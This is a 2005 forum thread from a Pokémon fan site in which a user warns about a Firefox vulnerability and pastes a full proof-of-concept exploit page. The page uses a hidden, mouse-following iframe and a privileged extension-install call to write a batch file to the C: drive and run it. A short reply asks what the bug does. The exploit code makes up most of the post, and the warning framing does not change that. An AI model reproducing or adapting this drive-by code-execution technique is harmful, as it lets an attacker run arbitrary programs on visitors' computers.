• There is an important update regarding account security and 2FA. Please click here for more information.
  • Welcome to PokéCommunity! Register now and join one of the best fan communities on the 'net to talk Pokémon and more! We are not affiliated with The Pokémon Company or Nintendo.
  • Imgur has blocked certain regions from viewing any images uploaded to their site. If you use Imgur, please consider replacing any image links/embeds you may have on PokéCommunity so everyone can see your images. Click here to learn more.

Mozilla Firefox 0day Vulnerability

DarkMew

Dark Sith Lord
  • 80
    Posts
    20
    Years
    Watch out for this newly discovered Firefox vulnerability.
    It is called "0day", the Mozilla people are working to fix it.
    This is how it works:
    When a user clicks inside a specially crafted web page, the browser
    will make a malicious batch file and execute it.
    Here is example code:
    -----------0day_example.html-------------------------
    // FrSIRT Comment - This is a 0day exploit/vulnerability (unpatched)
    // If a user clicks anywhere on a specially crafted page, this code will
    // automatically create and execute a malicious batch/exe file.
    //
    // Update (08.05.2005) - The Mozilla Foundation patched (partially) this
    // issue on the server side by adding random letters and numbers to the
    // install function, which will prevent this exploit from working.

    <html><head><title>firefox 0day exploit</title>

    <body>Click anywhere inside this page<br>
    <br>Advisory - https://www.frsirt.com/english/advisories/2005/0493<br>
    <iframe onload="loader()" src="javascript:'<noscript>'+eval('if

    (window.name!=\'stealcookies\')
    {window.name=\'stealcookies\';} else{ event={target:

    {href:\'https://ftp.mozilla.org/pub/
    mozilla.org/extensions/flashgot/flashgot-0.5.9.1-fx+mz+tb.xpi\'}};install

    (event,\'You are
    vulnerable!!!\',\'javascript:eval

    (\\\'netscape.security.PrivilegeManager.enablePrivilege(\\\\\\\'
    UniversalXPConnect\\\\\\\');file=Components.classes

    [\\\\\\\'@mozilla.org/file/local;1\\\\\\\'].
    createInstance(Components.interfaces.nsILocalFile);file.initWithPath

    (\\\\\\\'c:\\\\\\\\\\\\\\\\
    booom.bat\\\\\\\');file.createUnique

    (Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420);
    outputStream=Components.classes[\\\\\\\'@mozilla.org/network/file-output-

    stream;1\\\\\\\'].
    createInstance

    (Components.interfaces.nsIFileOutputStream);outputStream.init

    (file,0x04|0x08
    |0x20,420,0);output=\\\\\\\'@ECHO off\\\\\\\\ncls\\\\\\\\nECHO malicious

    commands here...
    \\\\\\\\nPAUSE\\\\\\\';outputStream.write

    (output,output.length);outputStream.close();file.launch();
    \\\')\'); }')+'</noscript><a

    href=\'https://addons.update.mozilla.org/extensions/moreinfo.php?
    id=220&application=firefox\'

    style=\'cursor:default;\'>   </'+'a>'"
    id="targetframe" scrolling="no" frameborder="0" marginwidth="0"

    marginheight=0" style=
    "position:absolute; left:0px; width:0px; height:6px; width:6px; margin:0px;

    padding:0px;
    -moz-opacity:0"></iframe>


    <script language="JavaScript" type="text/javascript">

    document.onmousemove = function trackMouse(e) {
    document.getElementById("targetframe").style.left = (e.pageX-3)+"px"
    document.getElementById("targetframe").style.top = (e.pageY-3)+"px"
    }

    var counter = 0;
    function loader() {
    counter++
    if(counter == 1) {
    stealcookies.focus()
    } else if(counter == 2) {
    stealcookies.history.go(-1)
    //targetframe.style.display="none";
    }
    }
    </script>
    </body>
    </html>
    ---------------------------end-------------------------------------
    This bug will probably be fixed soon.
     
    Whoa, that's interesting but I'm sure FF will find a solution for this bug very soon. Anyway what exactly does this bug do or what does the batch or exe file do.

    ~ CC
     
    Back
    Top